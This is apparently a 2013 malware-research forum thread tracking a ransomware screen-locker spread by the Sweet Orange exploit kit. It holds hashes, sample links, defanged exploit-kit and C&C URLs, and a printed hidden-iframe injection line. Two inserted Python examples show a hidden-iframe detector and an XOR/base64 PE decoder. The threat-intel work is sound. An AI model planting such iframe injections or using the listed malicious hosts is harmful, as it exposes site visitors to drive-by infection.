 #18668  by EP_X0FF
 Sat Mar 23, 2013 2:47 pm
I think it is bugged, as it is impossible to enter the correct deactivation code.

As for me, the new appearance looks much better. Asks for ~$65, hm, inflation; I remember they started from ~$15 in 2011.

SHA1 07fd52bdc326d79c174d7ccd2e2cedb07e9ea3fb

https://www.virustotal.com/en/file/fe1a ... /analysis/
https://www.virustotal.com/en/file/6a7c ... /analysis/
Attachments (pass: malware)
 #19120  by EP_X0FF
 Tue Apr 30, 2013 12:25 pm
Dropper, payload of Sweet Orange EK.

Iframe to EK.
Code:
<iframe src="hxxp://df.pizdafyqib.ru/administrator/weather.php?browse=151 width="0" height="0" frameborder="0"></iframe>
SHA256: 11761b0b7d20efe6815f900cf8a0242dae9dec29ee0e309fd1b288e7b9b1c0ef
SHA1: 75dcb3332f21aa31bac16429290e7f6285184824
MD5: a73f6edd6f698edd692fbfe86855f6a4

https://www.virustotal.com/en/file/1176 ... /analysis/

EXE + Jar (CVE-2012-1723) in the attachment. Keep your Java up to date, or better get rid of it once and for all.
Attachments (pass: infected)
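The injected iframe above is the typical pattern for silently pulling an exploit-kit landing page into a compromised site: a zero-size frame pointing at a third-party host. The following detector is an added example (not code from the thread or from any poster) that walks HTML with the standard-library parser and flags iframes that are hidden by zero dimensions or by inline style; the sample HTML and its `example.invalid` hosts are constructed.

```python
"""Flag hidden <iframe> elements of the kind used to load an exploit-kit
landing page without the visitor noticing. Added example; sample HTML is
constructed and uses reserved .invalid hosts."""
from html.parser import HTMLParser
import re

# "0", "00", "0.0", "0px" and friends all count as a zero dimension.
ZERO_RE = re.compile(r"^\s*0+(\.0+)?(px)?\s*$", re.I)
HIDDEN_STYLE_RE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


class HiddenIframeFinder(HTMLParser):
    """Collects (src, reason) for every iframe that is visually hidden."""

    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        # html.parser already lowercases tag and attribute names.
        if tag != "iframe":
            return
        a = {k: (v or "") for k, v in attrs}
        reasons = []
        for dim in ("width", "height"):
            if dim in a and ZERO_RE.match(a[dim]):
                reasons.append(f"{dim}=0")
        if HIDDEN_STYLE_RE.search(a.get("style", "")):
            reasons.append("hidden via style")
        if reasons:
            self.hits.append((a.get("src", ""), ", ".join(reasons)))


def find_hidden_iframes(html):
    """Return a list of (src, reason) for hidden iframes in the document."""
    parser = HiddenIframeFinder()
    parser.feed(html)
    parser.close()
    return parser.hits


# Constructed page: one legitimate embed, two hidden frames (defanged scheme).
SAMPLE_HTML = """<html><body>
<iframe src="https://video.example.com/embed/1" width="560" height="315"></iframe>
<iframe src="hxxp://ek.example.invalid/weather.php?browse=151" width="0" height="0" frameborder="0"></iframe>
<IFRAME SRC="hxxp://ek2.example.invalid/land/" style="display:none"></IFRAME>
</body></html>"""

if __name__ == "__main__":
    for src, reason in find_hidden_iframes(SAMPLE_HTML):
        print(f"hidden iframe -> {src} ({reason})")
```

Run it over a fetched page (or a web-proxy capture) and review every hit; a legitimate zero-size frame is rare enough that each one deserves a look, and the `src` host is the pivot for blocking and for hunting other pages carrying the same injection.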
 #19122  by Xylitol
 Tue Apr 30, 2013 1:09 pm
EP_X0FF wrote: Keep your Java up to date
urlquery got winlocked when I submitted the site http://urlquery.net/report.php?id=2243853
Code:
urlQuery Alerts	 No alerts detected
Not even detected as Sweet Orange :)
C&C:
Code:
hxxp://df.pizdafyqib.ru:8581/aw/index.php?m=stats
• dns: 1 ›› ip: 216.246.54.231 - adresse: DF.PIZDAFYQIB.RU
• dns: 1 ›› ip: 216.246.54.231 - adresse: B2B-VM6.VERTICALCOMMUNICATION.IN
 #19130  by mrbelyash
 Wed May 01, 2013 8:17 am
EP_X0FF wrote: I think it is bugged, as it is impossible to enter the correct deactivation code.

As for me, the new appearance looks much better. Asks for ~$65, hm, inflation; I remember they started from ~$15 in 2011.

SHA1 07fd52bdc326d79c174d7ccd2e2cedb07e9ea3fb

https://www.virustotal.com/en/file/fe1a ... /analysis/
https://www.virustotal.com/en/file/6a7c ... /analysis/
unlock code 121255545

http://stop-winlock.ru/2013/05/01/troja ... 15437.html
 #19166  by Xylitol
 Thu May 02, 2013 7:21 pm
EP_X0FF wrote:
Code:
hxxp://wsd.nuwazy.ru/sites/oplata/codestariff/themes.php?strategy=154
Code:
• dns: 1 ›› ip: 64.202.124.84 - adresse: WSD.NUWAZY.RU
hXXp://wsd.nuwazy.ru:8581/aw/
https://www.virustotal.com/ru/file/24f0 ... 367522337/
http://www.threatexpert.com/report.aspx ... c791b71390
Java 6 update 17 is enough to get the sample.
Attachments: infected
 #19180  by EP_X0FF
 Fri May 03, 2013 5:52 pm
Fresh
Code:
hxxp://za.omovigminet.ru/bugs/books/partner/themes.php?strategy=156
SHA256: e1dc306f502657cdc57fc4608aa6b4815747001478bf770afe7ec363fc264a8f
SHA1: 7d12a710f463d79e23ffe4f1bd94942537c3e868
MD5: c2b46eb6e92ebf65e9e8d580f17ecb98

https://www.virustotal.com/en/file/e1dc ... 367603355/
Attachments (pass: infected)
 #19263  by EP_X0FF
 Mon May 13, 2013 1:36 pm
Fresh
Code:
hxxp://rl7bh.ru/guest/recent.php?forums=170
landing
Code:
hxxp://z.ylyzafaq.ru/xx/
SHA256: 0bfbbf1eb94a2fb9004847a0b008c5fc688b0a04665f18dba3ef9a91c1a5dc87
SHA1: 4def049567188969f050893e93a8f61062182473
MD5: eb6f708178d87cec2e2588a379c23285

https://www.virustotal.com/ru/file/0bfb ... 368451928/
Attachments (pass: infected)
 #19625  by Xylitol
 Thu Jun 13, 2013 3:01 pm
PE embedded in the string, b64^0x7D
Attachments (4): infected
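"b64^0x7D" describes a common light obfuscation: the embedded executable is stored as a base64 string with a single-byte XOR (key 0x7D) on top. The decoder below is an added example, not a tool from the thread or from the poster. Because the note does not say whether the XOR is applied to the decoded bytes or to the base64 text itself, the recovery routine tries both orders and keeps the one that yields a plausible PE (an `MZ` header and a `PE\0\0` signature at `e_lfanew`). The sample blob it runs on is constructed from a minimal fake DOS/PE header, not taken from the attachments.

```python
"""Recover a PE stored as an XOR-0x7D-obfuscated base64 string.
Added example; SAMPLE_BLOB is a constructed stand-in, not the thread's sample."""
import base64
import struct

XOR_KEY = 0x7D  # single-byte key named in the post


def xor_bytes(data, key):
    """XOR every byte of data with a one-byte key."""
    return bytes(b ^ key for b in data)


def looks_like_pe(blob):
    """True if blob has 'MZ' at offset 0 and 'PE\\0\\0' at e_lfanew (offset 0x3C)."""
    if len(blob) < 0x40 or blob[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C)[0]
    return e_lfanew + 4 <= len(blob) and blob[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def recover_pe(s, key=XOR_KEY):
    """Try both readings of 'b64 ^ key' and return (pe_bytes, order_used),
    or (None, None) if neither order produces a PE header."""
    raw = s.encode() if isinstance(s, str) else bytes(s)
    candidates = []
    try:  # reading 1: base64 text wraps XOR-ed bytes
        candidates.append((xor_bytes(base64.b64decode(raw, validate=True), key),
                           "b64decode then xor"))
    except ValueError:  # binascii.Error is a ValueError subclass
        pass
    try:  # reading 2: the base64 text itself was XOR-ed
        candidates.append((base64.b64decode(xor_bytes(raw, key), validate=True),
                           "xor then b64decode"))
    except ValueError:
        pass
    for blob, order in candidates:
        if looks_like_pe(blob):
            return blob, order
    return None, None


def build_fake_pe():
    """Constructed stand-in: DOS header with e_lfanew = 0x40, then a PE signature
    and an i386 Machine field. Not a real executable."""
    dos = bytearray(b"MZ" + b"\x00" * 0x3E)
    struct.pack_into("<I", dos, 0x3C, 0x40)
    return bytes(dos) + b"PE\x00\x00" + b"\x4c\x01"


def obfuscate(blob, key=XOR_KEY, xor_first=True):
    """Produce the obfuscated form for testing. xor_first=True is the layout
    assumed here (bytes XOR-ed, then base64); False is the other order."""
    if xor_first:
        return base64.b64encode(xor_bytes(blob, key))
    return xor_bytes(base64.b64encode(blob), key)


SAMPLE_BLOB = obfuscate(build_fake_pe()).decode()

if __name__ == "__main__":
    pe, order = recover_pe(SAMPLE_BLOB)
    print(f"recovered {len(pe)} bytes via '{order}', header {pe[:2]!r}")
```

When carving from a real sample, feed `recover_pe` the string pulled from the dropper and write the returned bytes to disk only if the header check passes; the `(None, None)` result is the signal that the key or the encoding layer is not what the note suggests and the string needs a closer look.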